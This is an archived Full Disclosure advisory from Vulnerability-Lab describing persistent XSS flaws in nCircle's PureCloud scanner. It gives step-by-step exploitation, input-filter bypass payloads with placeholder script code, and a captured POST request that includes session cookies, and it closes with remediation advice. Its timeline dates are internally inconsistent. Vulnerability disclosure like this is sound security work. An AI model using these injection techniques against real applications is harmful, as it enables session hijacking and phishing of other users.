|
Full Disclosure
mailing list archives
nCircle PureCloud Vulnerability Scanner - Multiple Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab com>
Date: Tue, 29 Jan 2013 11:20:15 +0100
Title:
======
nCircle PureCloud Vulnerability Scanner - Multiple Vulnerabilities
Date:
=====
2013-01-28
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=795
nCircle Tracking ID: 20130117-US11337
VL-ID:
=====
795
Common Vulnerability Scoring System:
====================================
4.1
Introduction:
=============
nCircle PureCloud is brought to you by nCircle, the leading provider of information risk and security performance
management solutions.
PureCloud delivers an enterprise-class vulnerability scanner with more than double the coverage of other providers
covering thousands of
conditions and prioritized risk assessments – all in a cloud-based solution.
nCircle PureCloud is the world’s first security scanning technology that requires no scanning infrastructure on the
customer network.
PureCloud eliminates the need for firewall changes and software or hardware deployment on a customer`s internal
network.. Requiring only
a Web browser, PureCloud securely scans a private network to identify a broad range of vulnerabilities and risks, and
provides detailed
guidance on the steps necessary to reduce or eliminate those risks. With PureCloud, small businesses and home offices
benefit from nCircle’s
most advanced enterprise class security scanning solution, without the complexity or maintenance associated with
traditional SaaS or on-premise
scanning products. PureCloud is delivered as a software service in the Cloud, making it cost-effective, efficient and
widely accessible.
(Copy of the Vendor Homepage: https://purecloud.ncircle.com/about_purecloud/ )
Abstract:
=========
The Vulnerability-Laboratory Research Team discovered a web vulnerability in the nCircle PureCloud (cloud-based)
Vulnerability Scanner Application.
Report-Timeline:
================
2012-12-24: Researcher Notification & Coordination
2012-12-25: Vendor Notification
2012-01-16: Vendor Response/Feedback
2012-01-28: Vendor Fix/Patch by nCricle Dev
2012-01-28: Public Disclosure
Status:
========
Published
Affected Products:
==================
nCircle
Product: PureCloud - Vulnerability Scanner (cloud-based) 2012 Q4
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
A persistent and client side POST Injection web vulnerability is detected in the in the nCircle PureCloud (cloud-based)
Vulnerability Scanner Application.
The vulnerability typus allows an attacker to inject own malicious script code in the vulnerable module on application
side (persistent).
1.1
The first vulnerability is located in the Scan Now > Scan Type > Perimeter Scan > Scan section when processing to
request via the
`Scan Specific Devices - [Add Devices]` module and the bound vulnerable formErrorContent exception-handling application
parameters.
The persistent injected script code will be executed out of the `invalid networks` web application exception-handling.
To bypass
the standard validation of the application filter the attacker need to provoke the specific invalid networks
exception-handling error.
In the secound step the attacker splits the request of the invalid filter context to execute after it the not parsed
malicious script code.
The vulnerability can be exploited on client side via force manipulated link as malicious request with medium user
interaction but also
via server side by a post injection in the later affected add server listing module.
1.2
The secound vulnerability is bound to the first issue and located in the IP & Name output listing of the scan index
after processing to
add a network/server/ip. The code will be executed out of the main ip & name listing after an evil inject via add
module. To bypass the
ip restriction filter it is required to split the request like in the first issue with a valid ip. The remote attacker
includes a
valid ip+split(%20)`+own_scriptcode to pass through the system validation filter and execute the script code out of the
device name and ip listing.
The vulnerability can be exploited with privileged application user account and low or medium required user interaction.
Successful exploitation of the vulnerability result in persistent/non-persistent session hijacking,
persistent/non-persistent
phishing, external redirect, external malware loads and persistent/non-persistent vulnerable module context
manipulation.
Vulnerable Service(s):
[+] nCircle PureCloud (cloud-based) Vulnerability Scanner
[https://purecloud.ncircle.com/index/]
Vulnerable Section(s):
[+] Scan Now > Scan Type > Perimeter Scan > Scan
Vulnerable Module(s):
[+] Scan Specific Devices - [Add Devices]
[+] Scan IP (Index)
Vulnerable Parameter(s):
[+] formErrorContent
[+] ip &- name
Affected Module(s):
[+] Exception Handling - Invalid Network(s)
[+] Scan Index - Listing
Proof of Concept:
=================
The client- & server-side web vulnerability can be exploited by remote attackers and local privileged application user
accounts with
low or medium user interaction. For demonstration or reproduce ...
1.1
Note:
When you try to inject a standard iframe, img src, script or onload the context will be parsed by the
exception-handling to
prevent the first execution after the inject attempt. To bypass the validation we first inject a frame which matches
with the invalid
exception filter to display the error. Now, we split the request with %20 and inject our code after the split via POST.
Manually Exploitation:
1. Register an account at nCircle PureCloud to get access to the (cloud-based) Vulnerability Scanner-
[https://purecloud.ncircle.com/registerinfo3/?hacknewssocial]
2. Login to your account and switch to the scan now menu, open the scan type site
3. Choose the Perimeter Scan, not the local one!
4. Include a standard script alert tag to provoke the exception-handling, split the request with %20' and inject your
own frame onload script code. Save via Add!
5. The scirpt code will be executed out of the exception-handling invalid networks message.
6. Done #1 ... Successful reproduced! Press Continue to exploit also the listing :)
7. Include a valid ip, split the request (bypass the input restriction) and inject after it your own script code.
8. Watch the scan index. The code will be executed out of the vulnerable name and ip value output listing.
9. Done #2 ... Successful reproduced!
PoC:
#1 <iframe src=PROVOKEINVALIDEXCEPTION1> %20' >"<[OWN INJECTED PERSISTENT SCRIPT CODE!]>
#2 <script>alert("PROVOKEINVALIDEXCEPTION2")</script> < %20' "><[OWN INJECTED PERSISTENT SCRIPT CODE!]) <
Review: Scan Specific Devices > [Add Devices] - Exception Handling - Invalid Network(s)
<div style="opacity: 0.87; position: absolute; top: 287px; left: 461px; margin-top: -200px;"
class="id_add_hosts_textformError parentFormscan-form formError">
<div class="formErrorContent">
The following networks are invalid: %20"><"><script>alert(\"PROVOKEEXCEPTION\")> < %20' ">"<[PERSISTENT/NON-PERSISTENT
INJECTED SCRIPT CODE!]>
(host not found)</iframe></div><div class="formErrorArrow"><div class="line10"><!-- --></div><div class="line9"><!--
--></div>
<div class="line8"><!-- --></div><div class="line7"><!-- --></div><div class="line6"><!-- --></div><div
class="line5"><!-- --></div>
<div class="line4"><!-- --></div><div class="line3"><!-- --></div><div class="line2"><!-- --></div><div
class="line1"><!-- --></div></div></div>
<input value="%20"><iframe src=[PROVOKE!]>%20 >"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]>"
id="id_add_hosts_text" tabindex="5" class="wizardInput" placeholder="Add Devices" type="text">
<button id="add_button" class="addButton">Add</button>
</div>
--- Manipulated POST Values ---
csrfmiddlewaretoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N
json_data={"connector":-1,"scan_connected_network":false,
"registration_id":"","scope_name":"","editing_scope_schedule":false,
"webapp":false,"targets":["><script>alert(\"PROVOKEEXCEPTION\")> < %20' ">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT
CODE!]) <"]}
--- Manipulated POST Request ---
Status: 200[OK]
POST https://purecloud.ncircle.com/services/validate_targets/
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[181] Mime Type[application/json]
Request Header:
Host[purecloud.ncircle.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://purecloud.ncircle.com/index/]
Content-Length[439]
Cookie[csrftoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N;
sessionid=8c8624ba5e31c63bf24bcbf9af796743;
BIGipServerPICO-443to80=1875711404.20480.0000; utmcct=/ben37.root; wcsid=uNTCNCc0tpp1NCv01YCYlGfr93631472;
hblid=kRw3BvqhoczGhyJc8E8J5dYW93631472;
_oklv=1356379996583%2CuNTCNCc0tpp1NCv01YCYlGfr93631472;
olfsk=olfsk02835150931791619;
_okbk=cd5%3Davailable%2Ccd4%3Dtrue%2Cwa1%3Dfalse%2Cvi5%3D0%2Cvi4%3D1356378355284%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8
%3Dchat%2Ccd6%3D0%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9363-144-10-3734; __unam=97cb67-13bce735458-18f208d4-21;
_mkto_trk=id:671-RXE-353&token:_mch-ncircle.com-1356378363952-41877]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
csrfmiddlewaretoken[HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N]
json_data[%7B%22connector%22%3A-1%2C%22scan_connected_network%22%3Afalse%2C%22registration_id%22%3A%22%22%2C%22scope_name
%22%3A%22%22%2C%22editing_scope_schedule%22%3Afalse%2C%22webapp%22%3Afalse%2C%22targets%22%3A%5B%22%2520%5C%22+%2520+%5C%22%3E%3C
iframe+src%3Da+onload%3Dalert(%5C%22PROVOKEEXCEPtION%5C%22)+%3C++%5C%22%3E%3C[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT
CODE!])+%3C%22%5D%7D]
Response Header:
Date[Mon, 24 Dec 2012 20:13:25 GMT]
Server[Apache]
Content-Language[en]
Content-Encoding[gzip]
Vary[Accept-Language,Cookie,Accept-Encoding]
X-Frame-Options[SAMEORIGIN]
Content-Length[181]
Keep-Alive[timeout=15, max=76]
Connection[Keep-Alive]
Content-Type[application/json]
1.2
The server-side (persistent) web vulnerability can be exploited by remote attackers and local privileged application
user accounts with
low user interaction. For demonstration or reproduce ...
PoC:
[VALID IP]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
[VALID NAME]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
Solution:
=========
Parse the exception-handling error output listing and disallow error echos with requested web context.
To fix the vulnerability parse the context of the input fields in the add devices module. Restrict the the input fields
with a secure filter mask.
Parse also the name & ip scan index output listing and restrict the input of the requested web context scan listing.
2012-01-28: Vendor Fix/Patch by nCricle Dev
Risk:
=====
1.1
The security risk of the client- and server-side post injection web vulnerability in the exception handling and listing
is estimated as medium(+).
1.2
The security risk of the persistent input validation vulnerability in the scan index listing is estimated as medium(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () vulnerability-lab com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all
warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss
of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such
damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack
into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com -
www.vulnerability-lab.com/register
Contact: admin () vulnerability-lab com - support () vulnerability-lab com - research ()
vulnerability-lab com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com -
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the
use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode,
videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record,
list (feed),
modify, use or edit our material contact (admin () vulnerability-lab com or support () vulnerability-lab com) to get a
permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research () vulnerability-lab com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
- nCircle PureCloud Vulnerability Scanner - Multiple Vulnerabilities Vulnerability Lab (Jan 29)
|
